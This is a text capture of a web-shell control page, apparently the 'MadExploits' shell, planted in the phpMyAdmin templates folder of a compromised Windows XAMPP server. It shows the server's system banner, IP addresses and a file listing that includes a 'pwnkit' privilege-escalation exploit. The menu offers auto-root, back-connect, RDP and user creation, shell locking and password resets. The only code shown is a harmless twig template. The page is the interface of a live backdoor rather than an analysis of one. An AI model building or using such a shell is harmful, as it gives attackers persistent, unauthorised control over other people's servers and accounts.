Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.9
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
phpMyAdmin /
templates /
database /
qbe /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
column_select_cell.twig
393
B
-rw-rw-rw-
index.twig
683
B
-rw-rw-rw-
ins_del_and_or_cell.twig
1.05
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
selection_form.twig
3.84
KB
-rw-rw-rw-
sort_order_select_cell.twig
344
B
-rw-rw-rw-
sort_select_cell.twig
429
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ins_del_and_or_cell.twig
<td class="value text-nowrap"> <table class="table table-borderless table-sm"> <tr> <td class="value text-nowrap p-0"> <small>{% trans 'Ins:' %}</small> <input type="checkbox" name="criteriaRowInsert[{{ row_index }}]" aria-label="{% trans 'Insert' %}"> </td> <td class="value p-0"> <strong>{% trans 'And:' %}</strong> </td> <td class="p-0"> <input type="radio" name="criteriaAndOrRow[{{ row_index }}]" value="and"{{ checked_options.and ? ' checked' }} aria-label="{% trans 'And' %}"> </td> </tr> <tr> <td class="value text-nowrap p-0"> <small>{% trans 'Del:' %}</small> <input type="checkbox" name="criteriaRowDelete[{{ row_index }}]" aria-label="{% trans 'Delete' %}"> </td> <td class="value p-0"> <strong>{% trans 'Or:' %}</strong> </td> <td class="p-0"> <input type="radio" name="criteriaAndOrRow[{{ row_index }}]" value="or"{{ checked_options.or ? ' checked' }} aria-label="{% trans 'Or' %}"> </td> </tr> </table> </td>
Close